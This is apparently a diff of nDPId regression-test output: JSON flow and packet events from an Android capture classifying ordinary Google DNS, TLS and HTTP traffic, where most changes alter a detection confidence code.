+01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871075,"flow_last_seen":1582454871103,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871103,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": 
{"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":220,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871042,"flow_last_seen":1582454871105,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871105,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":221,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871115,"flow_last_seen":1582454871115,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454871115,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":40580,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1582454871115,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871115,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8q7VAAEARCZrAqAIQwKgCAZ6EADUAKMiehDwBAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE="} -00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871115,"flow_last_seen":1582454871115,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454871115,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":40580,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871115,"flow_last_seen":1582454871115,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454871115,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":40580,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1582454871117,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1582454871117,"pkt":"TGr2n\/YnxiwDYGpkCABFAABM2yQAAEARGhvAqAIBwKgCEAA1noQAOIeohDyBgAABAAEAAAAAA3d3dwZnb29nbGUDY29tAAABAAHADAABAAEAAADaAATY7yZ4"} -00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":223,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871115,"flow_last_seen":1582454871117,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454871117,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":40580,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": 
{"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} +00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":223,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871115,"flow_last_seen":1582454871117,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454871117,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":40580,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":225,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1582454871128,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871128,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA83d0AAGcGtfGtwk9ywKgCEABQj+ImKPRybuhwKaAS87giVwAAAgQFlgQCCArBhO\/i\/\/82yQEDAwg="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1582454871130,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871130,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0RuJAAEAGM\/XAqAIQrcJPco\/iAFBu6HApJij0c4AQAVdDYAAAAQEICv\/\/NtHBhO\/i"} 
-00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871094,"flow_last_seen":1582454871131,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1582454871131,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36834,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"},"http": {"hostname":"check.googlezip.net","url":"check.googlezip.net\/connect","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 9; Nokia 2.2) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/79.0.3945.93 Mobile Safari\/537.36"}} -01081{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":228,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871075,"flow_last_seen":1582454871132,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871132,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871094,"flow_last_seen":1582454871131,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1582454871131,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36834,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"},"http": {"hostname":"check.googlezip.net","url":"check.googlezip.net\/connect","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 9; Nokia 2.2) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/79.0.3945.93 Mobile Safari\/537.36"}} +01081{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":228,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871075,"flow_last_seen":1582454871132,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871132,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1582454871132,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871132,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8KYcAAHYGldms2RXKwKgCEAG7ytjkokMBL2I0XaAS6yDzNwAAAgQFZAQCCAptKuid\/\/82ywEDAwg="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1582454871135,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871135,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0AphAAEAGstDAqAIQrNkVysrYAbsvYjRd5KJDAoAQAVcLdwAAAQEICv\/\/NtNtKuid"} -01081{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":236,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871042,"flow_last_seen":1582454871135,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871135,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":241,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871103,"flow_last_seen":1582454871138,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871138,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"datasaver.googleapis.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01081{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":236,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871042,"flow_last_seen":1582454871135,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871135,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 
{"6":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":241,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871103,"flow_last_seen":1582454871138,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871138,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"datasaver.googleapis.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":243,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871152,"flow_last_seen":1582454871152,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871152,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":243,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1582454871152,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871152,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA82rlAAEAGneLAqAIQ2O8meIDkAbvMauxuAAAAAKAC\/\/8TjwAAAgQFtAQCCAr\/\/zbXAAAAAAEDAwg="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":246,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1582454871166,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871166,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA82hIAAHUGqYnY7yZ4wKgCEAG7gOSVNE5IzGrsb6AS6yB0TQAAAgQFZAQCCArIBAje\/\/821wEDAwg="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1582454871167,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871167,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA02rpAAEAGnenAqAIQ2O8meIDkAbvMauxvlTROSYAQAVeMkAAAAQEICv\/\/NtvIBAje"} 
-00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":250,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871103,"flow_last_seen":1582454871175,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871175,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"datasaver.googleapis.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871152,"flow_last_seen":1582454871200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871200,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 
-01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871069,"flow_last_seen":1582454871207,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871207,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00904{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":260,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871152,"flow_last_seen":1582454871230,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1598,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1582454871230,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} 
-01154{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":261,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454871152,"flow_last_seen":1582454871230,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2734,"flow_avg_l4_payload_len":390,"midstream":0,"thread_ts_msec":1582454871230,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","server_names":"www.google.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=www.google.com","alpn":"http\/1.1","fingerprint":"32:07:6C:9F:96:7D:CE:82:15:C6:C5:7B:49:90:53:A1:CF:80:4F:B0"}} -01081{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":264,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871069,"flow_last_seen":1582454871237,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871237,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":250,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871103,"flow_last_seen":1582454871175,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871175,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"datasaver.googleapis.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871152,"flow_last_seen":1582454871200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871200,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": 
